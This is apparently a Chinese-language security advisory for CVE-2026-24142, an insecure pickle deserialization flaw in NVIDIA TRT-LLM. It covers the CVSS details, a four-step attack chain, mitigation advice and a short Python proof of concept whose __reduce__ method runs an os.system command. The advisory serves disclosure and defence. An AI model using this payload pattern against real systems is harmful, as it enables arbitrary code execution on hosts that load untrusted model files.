CVE-2026-24142 CVSS 6.3 中危

CVE-2026-24142 NVIDIA TRT-LLM反序列化漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24142

漏洞类型

反序列化漏洞

CVSS评分

6.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NVIDIA TRT-LLM

漏洞概述

NVIDIA TRT-LLM在任意平台上存在反序列化漏洞及不安全的序列化句柄。该漏洞允许本地低权限攻击者利用恶意构造的数据触发反序列化过程，从而导致代码执行、数据篡改及敏感信息泄露。鉴于其CVSS v3.1评分为6.3，属于中危风险，且攻击范围具有扩展性，建议用户尽快关注官方修复动态以防止潜在的安全威胁。

技术细节

该漏洞的核心成因在于NVIDIA TRT-LLM组件在处理反序列化操作时，未能正确验证输入数据的来源和完整性，导致存在不安全的反序列化句柄。具体而言，应用程序在加载模型或配置文件时，可能会调用不安全的反序列化函数（如Python的pickle）。攻击者一旦获得本地低权限账户（PR:L），即可利用该漏洞。攻击过程包括：首先构造一个恶意的序列化对象，该对象在反序列化时会触发特定的魔术方法，从而执行任意系统命令。由于该漏洞具有范围变更特性（S:C），攻击者不仅可以破坏TRT-LLM进程的机密性、完整性和可用性，还可能利用该进程的权限提升访问权限，进而影响系统上的其他服务或用户数据，造成信息泄露或更广泛的数据篡改。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者需要在目标系统上拥有低权限账户（PR:L），以便能够访问文件系统或执行程序。

STEP 2

2. 构造恶意序列化对象

攻击者编写Python脚本，利用pickle等机制创建包含恶意命令（如反弹Shell或写入文件）的序列化数据。

STEP 3

3. 替换或诱导加载恶意句柄

攻击者将生成的恶意文件放置在TRT-LLM会读取的路径，或者诱导应用程序加载该不安全的序列化句柄文件。

STEP 4

4. 触发反序列化

当TRT-LLM尝试反序列化该文件时，恶意代码被自动解析并执行，导致系统被控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pickle
import os

# Define a malicious class that executes code upon deserialization
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., creating a file or reverse shell)
        return (os.system, ('touch /tmp/poc_success',))

# Serialize the malicious object
malicious_data = pickle.dumps(MaliciousPayload())

# Simulate writing to an unsafe handle/file that TRT-LLM might load
with open('malicious_model.handle', 'wb') as f:
    f.write(malicious_data)

print("Malicious handle generated. If TRT-LLM loads this, code will execute.")

影响范围

NVIDIA TRT-LLM（具体受影响版本请参考NVIDIA官方安全公告）

防御指南

临时缓解措施

在未修复前，应严格限制本地用户对应用程序及配置文件的访问权限，避免加载来源不明的模型文件。同时，应监控系统异常的进程创建行为，以便及时发现潜在的利用尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表